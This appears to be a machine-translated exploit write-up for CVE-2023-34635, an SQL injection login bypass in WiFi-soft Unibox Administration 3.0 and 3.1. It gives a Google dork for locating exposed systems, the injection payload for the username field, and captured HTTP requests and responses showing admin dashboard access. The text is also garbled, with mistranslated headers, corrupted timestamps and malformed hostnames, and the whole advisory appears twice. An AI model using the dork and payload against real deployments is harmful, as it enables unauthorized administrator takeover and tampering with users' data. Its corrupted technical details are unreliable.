#利用标题: WiFi软unibox管理3.0 3.1登录页面-SQL注入
#Google Dork: Intext:'unibox Administmation 3.1',Intext:'unibox 3.0'
#日期: 07/2023
#利用作者: ansh Jain @sudoark
#作者联系: [email protected]
#供应商homepage: https://www.wifi-soft.com/
#软件link:
#版本: Unibox Administration 3.0 3.1
#测试在: Microsoft Windows 11
#CVE : CVE-2023-34635
#cve url : https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2023-34635
wifi软unibox管理3.0和3.1登录页面很容易受到影响
SQL注入,这可能会导致攻击者未经授权的管理员访问。
漏洞是由于未验证或消毒用户而发生的
在登录页面的用户名字段中输入,直接发送
输入后端服务器和数据库。
##如何复制
步骤1 :访问登录页面并检查版本,是否是3.0,
3.1,或不。
步骤2 :添加此有效载荷'''或1=1限制1---'
输入任何随机密码。
步骤3 :填充验证码并登录。登录后,您有
已成功登录为管理员,可以看到任何人的用户
数据,修改数据,撤销访问等。
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
###登录请求
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
参数:用户名,密码,验证码,操作
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
post /index.php http /2
HOST: 255.255.255.255.host.com
cookie: phpsessid=rfds9jjjbu7jorb9kgjsko858d
用户- 代理: Mozilla/5.0(X11; Linux X86_64; rv:102.0)壁虎/20100101
Firefox/102.0
接受:
text/html,application/xhtml+xml,application/xml; q=0.9,image/avif,image/webp,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
content-type:应用程序/x-www-form-urlenceded
内容长度: 83
Origin: https://255.255.255.255.255.255.host.com
Referer: https://255.255.255.255.255.host.com/index.php
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
TE:拖车
用户名='or+1=1+限制+1 - + - 密码=randompasswordcaptcha=69199Action=登录
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
###登录响应
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
发现HTTP/2 302
server: nginx
Date: TUE,18 Jul 2023 133333323:14 GMT
content-type:文本/html; charset=UTF-8
位置:/dashboard/dashboard
Expires: THU,1981年11月19日08333333333:00 GMT
cache-control:无存储,无缓存,必须恢复活力
pragma:无缓存
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
###成功的loggedin请求
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
获取/仪表板/仪表板http/2
HOST: 255.255.255.255.host.com
cookie: phpsessid=rfds9jjjbu7jorb9kgjsko858d
用户- 代理: Mozilla/5.0(X11; Linux X86_64; rv:102.0)壁虎/20100101
Firefox/102.0
接受:
text/html,application/xhtml+xml,application/xml; q=0.9,image/avif,image/webp,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
Referer: https://255.255.255.255.255.host.com/index.php
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
TE:拖车
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
###成功的loggedin响应
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http/2 200好
server: nginx
Date: TUE,18 Jul 2023 133333323:43 GMT
content-type:文本/html; charset=UTF-8
Expires: THU,1981年11月19日08333333333:00 GMT
cache-control:无存储,无缓存,必须恢复活力
pragma:无缓存
cache_control:私有
!doctype html
html lang='en'
HTML内容
/html
#Google Dork: Intext:'unibox Administmation 3.1',Intext:'unibox 3.0'
#日期: 07/2023
#利用作者: ansh Jain @sudoark
#作者联系: [email protected]
#供应商homepage: https://www.wifi-soft.com/
#软件link:
正在加载...
ww.wifi-soft.com
#测试在: Microsoft Windows 11
#CVE : CVE-2023-34635
#cve url : https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2023-34635
wifi软unibox管理3.0和3.1登录页面很容易受到影响
SQL注入,这可能会导致攻击者未经授权的管理员访问。
漏洞是由于未验证或消毒用户而发生的
在登录页面的用户名字段中输入,直接发送
输入后端服务器和数据库。
##如何复制
步骤1 :访问登录页面并检查版本,是否是3.0,
3.1,或不。
步骤2 :添加此有效载荷'''或1=1限制1---'
输入任何随机密码。
步骤3 :填充验证码并登录。登录后,您有
已成功登录为管理员,可以看到任何人的用户
数据,修改数据,撤销访问等。
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
###登录请求
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
参数:用户名,密码,验证码,操作
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
post /index.php http /2
HOST: 255.255.255.255.host.com
cookie: phpsessid=rfds9jjjbu7jorb9kgjsko858d
用户- 代理: Mozilla/5.0(X11; Linux X86_64; rv:102.0)壁虎/20100101
Firefox/102.0
接受:
text/html,application/xhtml+xml,application/xml; q=0.9,image/avif,image/webp,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
content-type:应用程序/x-www-form-urlenceded
内容长度: 83
Origin: https://255.255.255.255.255.255.host.com
Referer: https://255.255.255.255.255.host.com/index.php
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
TE:拖车
用户名='or+1=1+限制+1 - + - 密码=randompasswordcaptcha=69199Action=登录
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
###登录响应
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
发现HTTP/2 302
server: nginx
Date: TUE,18 Jul 2023 133333323:14 GMT
content-type:文本/html; charset=UTF-8
位置:/dashboard/dashboard
Expires: THU,1981年11月19日08333333333:00 GMT
cache-control:无存储,无缓存,必须恢复活力
pragma:无缓存
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
###成功的loggedin请求
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
获取/仪表板/仪表板http/2
HOST: 255.255.255.255.host.com
cookie: phpsessid=rfds9jjjbu7jorb9kgjsko858d
用户- 代理: Mozilla/5.0(X11; Linux X86_64; rv:102.0)壁虎/20100101
Firefox/102.0
接受:
text/html,application/xhtml+xml,application/xml; q=0.9,image/avif,image/webp,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
Referer: https://255.255.255.255.255.host.com/index.php
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
TE:拖车
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
###成功的loggedin响应
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http/2 200好
server: nginx
Date: TUE,18 Jul 2023 133333323:43 GMT
content-type:文本/html; charset=UTF-8
Expires: THU,1981年11月19日08333333333:00 GMT
cache-control:无存储,无缓存,必须恢复活力
pragma:无缓存
cache_control:私有
!doctype html
html lang='en'
HTML内容
/html
